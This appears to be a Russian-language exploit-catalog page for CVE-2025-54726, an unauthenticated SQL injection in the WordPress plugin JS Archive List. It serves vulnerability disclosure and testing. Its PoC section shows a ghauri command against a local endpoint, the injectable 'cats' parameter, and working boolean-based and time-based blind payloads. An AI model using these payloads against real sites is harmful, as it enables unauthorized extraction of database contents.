Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-54726 — JS Archive List <= 6.1.5 - Неавторизованная SQL-инъекция | Kitploit
Инструменты/GitHubGitHub/randomrobbiebf/cve-2025-54726
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubrandomrobbiebf/cve-2025-54726

CVE-2025-54726

JS Archive List <= 6.1.5 - Неавторизованная SQL-инъекция

Репозиторий
10 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-54726

JS Archive List <= 6.1.5 - Неаутентифицированная SQL-инъекция

Описание

Плагин JS Archive List для WordPress подвержен SQL-инъекции во всех версиях до 6.1.5 включительно из‑за недостаточного экранирования пользовательского параметра и отсутствия должной подготовки существующего SQL-запроса. Это позволяет неаутентифицированным атакующим добавлять дополнительные SQL-запросы в уже существующие, что может быть использовано для извлечения конфиденциальной информации из базы данных.

Детали

  • Тип: plugin
  • Slug: jquery-archive-list-widget
  • Затронутая версия: 6.1.5
  • Оценка CVSS: 7.5
  • Уровень CVSS: Высокий
  • Вектор CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • CVE: CVE-2025-54726
  • Статус: Активен

POC

root@kitploit:~
ghauri  -u "http://localhost/wp-json/jalw/v1/archive?cats=1&exclusionType=exclude"


  ________.__                        .__  {1.4.1}
 /  _____/|  |__ _____   __ _________|__|
/   \  ___|  |  \\__  \ |  |  \_  __ \  |
\    \_\  \   Y  \/ __ \|  |  /|  | \/  |
 \______  /___|  (____  /____/ |__|  |__|
        \/     \/     \/         https://github.com/r0oth3x49
                                 An advanced SQL injection detection & exploitation tool.



[*] starting @ 16:39:05 /2025-09-25/

[16:39:05] [INFO] testing connection to the target URL
Ghauri resumed the following injection point(s) from stored session:
---
Parameter: cats (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cats=1 AND 01609=1609&exclusionType=exclude

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (IF - comment)
    Payload: cats=if(now()=sysdate(),SLEEP(5),0)&exclusionType=exclude
---
[16:39:05] [INFO] testing MySQL
[16:39:05] [INFO] confirming MySQL
[16:39:06] [INFO] the back-end DBMS is MySQL

Скачать инструмент